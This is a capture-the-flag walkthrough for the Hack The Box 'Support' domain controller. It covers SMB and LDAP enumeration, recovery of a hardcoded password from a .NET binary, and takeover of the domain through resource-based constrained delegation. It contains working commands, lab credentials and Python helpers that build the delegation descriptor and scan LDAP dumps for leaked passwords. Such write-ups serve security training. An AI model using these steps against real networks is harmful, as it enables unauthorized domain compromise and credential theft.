
Enumeration

# Nmap 7.92 scan initiated Sat Jul 30 15:05:35 2022 as: nmap -A -oN nmap-scan -Pn 10.129.25.194
Nmap scan report for 10.129.25.194
Host is up (0.21s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-07-30 19:05:55Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  globalcatLDAPssl?
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -17s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-07-30T19:06:24
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 30 15:07:35 2022 -- 1 IP address (1 host up) scanned in 119.98 seconds

Starting with SMB, let's see what we have:

└─$ smbclient -L //support.htb/ -N            

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        support-tools   Disk      support staff tools
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to support.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
└─$ smbclient //support.htb/support-tools -N  
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jul 20 13:01:06 2022
  ..                                  D        0  Sat May 28 07:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
  putty.exe                           A  1273576  Sat May 28 07:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022

                4026367 blocks of size 4096. 871836 blocks available
smb: \>

.NET Source Code Review

I download UserInfo.exe.zip and unzip it to find a .NET Windows executable. Opening it in dnSpy, I find a key and an encrypted string, which should be the password:


I copied the decompiled code into Visual Studio and changed the return statement of the decryption routine to:

Console.WriteLine(Encoding.Default.GetString(array2));

Executing the C# program will now provide us with the password:

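Recompiling the decompiled class is one way to get the plaintext; the other is to re-implement the routine outside the binary. The following is an added example, not code from the original writeup: a Python port of the decryption that UserInfo.exe performs (base64-decode the embedded blob, then XOR every byte with the embedded key, repeated, and with the constant 223). The two constants are the ones embedded in the binary; they cannot be read on this page because the screenshots are missing. Running it prints the ldap bind password that appears in the next section.

```python
"""Re-implementation of the password decryption in UserInfo.exe.

Added example, not code from the original writeup. The decompiled routine
(viewed in dnSpy) base64-decodes an embedded blob and XORs each byte with
the embedded key, repeated, and with the constant 223 (0xDF); the C# line
in the writeup only changes how the result is printed. The two constants
are the ones embedded in the binary; they are not readable on this page
because its screenshots are missing.
"""
import base64

ENC_PASSWORD = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
KEY = b"armando"
CONSTANT = 0xDF


def decrypt(enc_b64: str, key: bytes, constant: int = CONSTANT) -> str:
    """Undo the obfuscation: out[i] = blob[i] ^ key[i % len(key)] ^ constant."""
    blob = base64.b64decode(enc_b64)
    plain = bytes(b ^ key[i % len(key)] ^ constant for i, b in enumerate(blob))
    # Encoding.Default is a single-byte code page on the target, so latin-1
    # reproduces it for every possible byte value.
    return plain.decode("latin-1")


def recover_key(enc_b64: str, known_plaintext: str, key_len: int,
                constant: int = CONSTANT) -> bytes:
    """XOR is its own inverse: key_len bytes of known plaintext give back the
    repeating key, which is why this is obfuscation rather than encryption
    even if the key were not sitting next to the blob in the assembly."""
    blob = base64.b64decode(enc_b64)
    pt = known_plaintext.encode("latin-1")
    return bytes(blob[i] ^ pt[i] ^ constant for i in range(key_len))


if __name__ == "__main__":
    password = decrypt(ENC_PASSWORD, KEY)
    print("ldap password:", password)
    print("key recovered from the first 7 plaintext bytes:",
          recover_key(ENC_PASSWORD, password[:7], 7))
```

The second function is there to make the point the binary's author missed: a static key XORed into a blob is reversible by anyone holding the executable, so the share effectively published the service account's password.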

Now to figure out where the password is used:


LDAP Enumeration

It is used to bind to LDAP as the user ldap with the password nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz. With those credentials, ldapdomaindump can dump all user, computer and group information:

ldapdomaindump -u 'support\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --no-html --no-grep support.htb -o output/

In output/ I find the following files:

└─$ ls -la
total 160
drwxr-xr-x 2 kali kali  4096 Jul 30 17:32 .
drwxr-xr-x 5 kali kali  4096 Jul 31 07:31 ..
-rw-r--r-- 1 kali kali  6886 Jul 30 17:31 domain_computers.json
-rw-r--r-- 1 kali kali 79816 Jul 30 17:31 domain_groups.json
-rw-r--r-- 1 kali kali  5652 Jul 30 17:31 domain_policy.json
-rw-r--r-- 1 kali kali     2 Jul 30 17:31 domain_trusts.json
-rw-r--r-- 1 kali kali 50183 Jul 30 17:31 domain_users.json

Alternatively, the same data can be browsed with JXplorer:


Checking the attributes of the user support, I get the following:


The info attribute holds the value Ironside47pleasure40Watchful, which I suspect is a password. The same information is in the dumped JSON files; grep domain_users.json for cn=support:

grep -i -C 5 "cn=support" domain_users.json

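Grepping for one known user only works once you already suspect that user. The following is an added example, not part of the original writeup: it walks every entry of an ldapdomaindump user export and reports the free-text attributes (info, description, comment and the legacy password attributes) whose values look like credentials, so a leaked password on any account is caught. SAMPLE is constructed here in the shape of ldapdomaindump's JSON (a list of entries with "dn" and "attributes"); the support user's info value is the one found above, the other accounts and values are made up for the sample.

```python
"""Scan an ldapdomaindump domain_users.json for credential-looking values
in descriptive attributes.

Added example, not from the original writeup. SAMPLE is constructed in the
shape ldapdomaindump writes (a JSON list of entries, each with "dn" and an
"attributes" dict whose values are lists); only the support user's info
value comes from the writeup, the rest is invented sample data.
"""
import json
import re
import sys

# Attributes admins tend to stuff passwords into, plus the legacy
# password-bearing attributes that are readable by authenticated users.
NOISY_ATTRS = ("info", "description", "comment",
               "userPassword", "unixUserPassword", "msSFU30Password")
PASSWORD_HINT = re.compile(r"pass|pwd|cred", re.I)

SAMPLE = json.dumps([
    {"dn": "CN=support,CN=Users,DC=support,DC=htb",
     "attributes": {"cn": ["support"], "sAMAccountName": ["support"],
                    "info": ["Ironside47pleasure40Watchful"]}},
    {"dn": "CN=Guest,CN=Users,DC=support,DC=htb",
     "attributes": {"cn": ["Guest"], "sAMAccountName": ["Guest"],
                    "description": ["Built-in account for guest access to the computer/domain"]}},
    {"dn": "CN=svc_sample,CN=Users,DC=support,DC=htb",   # constructed
     "attributes": {"cn": ["svc_sample"], "sAMAccountName": ["svc_sample"],
                    "description": ["Password: Summer2022!"]}},
    {"dn": "CN=plain,CN=Users,DC=support,DC=htb",        # constructed, nothing to find
     "attributes": {"cn": ["plain"], "sAMAccountName": ["plain"]}},
])


def looks_like_secret(value: str) -> bool:
    """Cheap heuristic: an explicit hint word, or a space-free token of 8+
    characters mixing upper, lower and digits (the shape of a typed password)."""
    if PASSWORD_HINT.search(value):
        return True
    if " " in value or len(value) < 8:
        return False
    return (any(c.islower() for c in value) and any(c.isupper() for c in value)
            and any(c.isdigit() for c in value))


def find_suspicious_attributes(entries) -> list:
    """Return (account, attribute, value) for every noisy attribute that
    looks like a secret. Handles both list and scalar attribute values."""
    hits = []
    for entry in entries:
        attrs = entry.get("attributes", {})
        name = attrs.get("sAMAccountName") or attrs.get("cn") or [entry.get("dn", "?")]
        name = name[0] if isinstance(name, list) else name
        for attr in NOISY_ATTRS:
            values = attrs.get(attr, [])
            if isinstance(values, str):
                values = [values]
            for value in values:
                if isinstance(value, str) and looks_like_secret(value):
                    hits.append((name, attr, value))
    return hits


def scan(json_text: str) -> list:
    """Parse an ldapdomaindump JSON document and scan it."""
    return find_suspicious_attributes(json.loads(json_text))


if __name__ == "__main__":
    # usage: python3 scan_users.py output/domain_users.json   (defaults to SAMPLE)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    for account, attr, value in scan(text):
        print(f"{account}\t{attr}\t{value}")
```

The heuristic is deliberately loose; the cost of a false positive is one line of output, while a missed description-field password costs the foothold.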

Initial Foothold

Using the value from the info attribute as the password, I try to log in with evil-winrm as the user support, and luckily I get access:


The flag is in C:\Users\support\Desktop\user.txt

Privilege Escalation

Now to check support's privileges:


Seeing which groups the user support is in:


The user support has the right to add a workstation to the domain. Adding a machine account by itself is not enough for the attack that follows: it also requires write access to the DC's computer object, since the Set-DomainObject step below writes its msDS-AllowedToActOnBehalfOfOtherIdentity attribute, which this user turns out to have. After some reading I ended up at my favourite all-in-one cheatsheet, ired.team.

For this to work we first need Powermad (https://github.com/Kevin-Robertson/Powermad), which provides New-MachineAccount. The Get-DomainComputer and Set-DomainObject cmdlets used further down come from PowerView, which has to be imported in the same session as well.

After downloading Powermad.ps1 I uploaded it to C:\Temp\, a directory I created, and imported it, then created the machine account:

Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

The commands above create a new computer object. Now to get its SID:

Get-DomainComputer fake01


The SID is S-1-5-21-1677581083-3380853377-188903654-5101

Now we create a raw security descriptor that grants that SID full control, and get its binary form:

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5101)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Now we write the descriptor bytes into the DC computer object's msDS-AllowedToActOnBehalfOfOtherIdentity attribute and read the attribute back to confirm:

Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
Get-DomainComputer dc -Properties 'msds-allowedtoactonbehalfofotheridentity'


With the DC now trusting FAKE01 for resource-based constrained delegation, I use the machine account to request a service ticket impersonating administrator (S4U2self followed by S4U2proxy) and log in with it:

impacket-getST support.htb/fake01:123456 -dc-ip 10.10.11.174 -impersonate administrator -spn www/dc.support.htb


export KRB5CCNAME=administrator.ccache
impacket-wmiexec support.htb/administrator@dc.support.htb -no-pass -k

And now we have Administrator Access!
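The security-descriptor step above is the one part of this chain that is opaque from the shell: RawSecurityDescriptor turns an SDDL string into bytes and the attribute write simply stores them. The following is an added example, not code from the original writeup: it builds the same self-relative descriptor in plain Python (so the attribute could equally be written over LDAP from Linux) and decodes an existing value, which is worth doing before overwriting the attribute because the write replaces whatever delegation rights the DC already held. Only the FAKE01 SID comes from the writeup; the byte layouts are the documented SECURITY_DESCRIPTOR, ACL, ACE and SID wire formats.

```python
"""Build and decode the msDS-AllowedToActOnBehalfOfOtherIdentity descriptor
used for resource-based constrained delegation.

Added example, not code from the original writeup. It reproduces what the
PowerShell RawSecurityDescriptor step does with the SDDL string
O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<SID>). Only the FAKE01 SID is taken
from the writeup; the structures are the self-relative SECURITY_DESCRIPTOR,
ACL, ACCESS_ALLOWED_ACE and SID wire formats.
"""
import struct

# SDDL two-letter rights for directory objects and the ADS_RIGHT_* bits they mean.
SDDL_RIGHTS = {
    "CC": 0x0001, "DC": 0x0002, "LC": 0x0004, "SW": 0x0008,      # create/delete/list child, self
    "RP": 0x0010, "WP": 0x0020, "DT": 0x0040, "LO": 0x0080,      # read/write property, delete tree, list object
    "CR": 0x0100,                                                # control access (extended rights)
    "SD": 0x10000, "RC": 0x20000, "WD": 0x40000, "WO": 0x80000,  # delete, read control, write DAC, write owner
}
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
ACCESS_ALLOWED_ACE_TYPE, ACL_REVISION_DS = 0x00, 4
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"  # SDDL alias BA, the owner in O:BA


def sddl_rights_mask(rights: str) -> int:
    """Fold a run of SDDL right codes ("CCDCLC...") into one access mask."""
    if len(rights) % 2:
        raise ValueError("rights string must be pairs of letters")
    mask = 0
    for i in range(0, len(rights), 2):
        mask |= SDDL_RIGHTS[rights[i:i + 2]]
    return mask


def sid_to_bytes(sid: str) -> bytes:
    """S-1-<authority>-<sub>... -> revision, count, 48-bit BE authority, LE sub-authorities."""
    parts = sid.split("-")
    if parts[:2] != ["S", "1"]:
        raise ValueError(f"not a SID: {sid}")
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", 1, len(subs)) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf: bytes, off: int = 0) -> str:
    """Decode the binary SID starting at buf[off:]."""
    rev, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs)


def build_rbcd_sd(allowed_sid: str, owner_sid: str = BUILTIN_ADMINISTRATORS,
                  rights: str = "CCDCLCSWRPWPDTLOCRSDRCWDWO") -> bytes:
    """Self-relative descriptor equivalent to O:BAD:(A;;<rights>;;;<allowed_sid>)."""
    owner, trustee = sid_to_bytes(owner_sid), sid_to_bytes(allowed_sid)
    # ACCESS_ALLOWED_ACE: type, flags, size, mask, trustee SID
    ace = struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(trustee),
                      sddl_rights_mask(rights)) + trustee
    # ACL: revision, sbz1, size, ace count, sbz2, followed by the ACEs
    acl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(ace), 1, 0) + ace
    owner_off = 20                      # fixed header size
    dacl_off = owner_off + len(owner)   # no group SID and no SACL (offsets 0)
    # SECURITY_DESCRIPTOR_RELATIVE: rev, sbz1, control, owner, group, sacl, dacl offsets
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         owner_off, 0, 0, dacl_off)
    return header + owner + acl


def allowed_to_act_sids(sd: bytes) -> list:
    """Trustee SIDs of the allow ACEs in a self-relative descriptor's DACL,
    i.e. the accounts currently allowed to delegate to this object."""
    control = struct.unpack_from("<H", sd, 2)[0]
    dacl_off = struct.unpack_from("<I", sd, 16)[0]
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    ace_count = struct.unpack_from("<H", sd, dacl_off + 4)[0]
    off, sids = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(bytes_to_sid(sd, off + 8))
        off += ace_size
    return sids


if __name__ == "__main__":
    fake01 = "S-1-5-21-1677581083-3380853377-188903654-5101"  # SID from the writeup
    sd = build_rbcd_sd(fake01)
    print(len(sd), "bytes:", sd.hex())
    print("allowed to act on behalf of dc:", allowed_to_act_sids(sd))
```

The mask that CCDCLCSWRPWPDTLOCRSDRCWDWO produces is 0xF01FF, full control over the object, which is more than the delegation check needs; the DC only tests whether the calling service's SID is granted access by the DACL. For detection, the same decoder run over the attribute as it appears in directory-service change events (event 5136 on the DC) shows exactly which SID was added.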

Briefing

The machine is overall very well made: a full AD box with some code review and debugging, plus computer-object takeover through Kerberos resource-based constrained delegation.